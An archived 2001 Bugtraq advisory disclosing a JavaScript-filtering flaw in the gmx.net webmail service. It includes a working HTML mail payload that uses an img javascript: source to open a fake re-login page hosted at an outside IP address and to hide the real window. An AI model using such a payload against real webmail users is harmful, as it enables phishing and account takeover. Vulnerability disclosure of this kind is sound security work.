gmx.net

From: rudi carell (rudicarellat_private)
Date: Mon Jun 11 2001 - 09:31:04 PDT

  • Next message: recidjvo: "[PkC] Advisory #005: Default Slackware 7.1 installation /etc/shells perms bug" 

    good morning buqtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html - <img> tag can be used to embedd malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser(if enabled:-) this 
makes it possible to place trojans and execute URL-based webmail-commands 
leading to a compromise of the users webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript: 
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more 
elaborate ..


nice day,


rc

rudicarellat_private
securityat_private
http://www.freefly.com





vendor status: mail has been sent to securityat_private


RC-EOF
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

    This archive was generated by hypermail 2b30 : Mon Jun 11 2001 - 11:48:06 PDT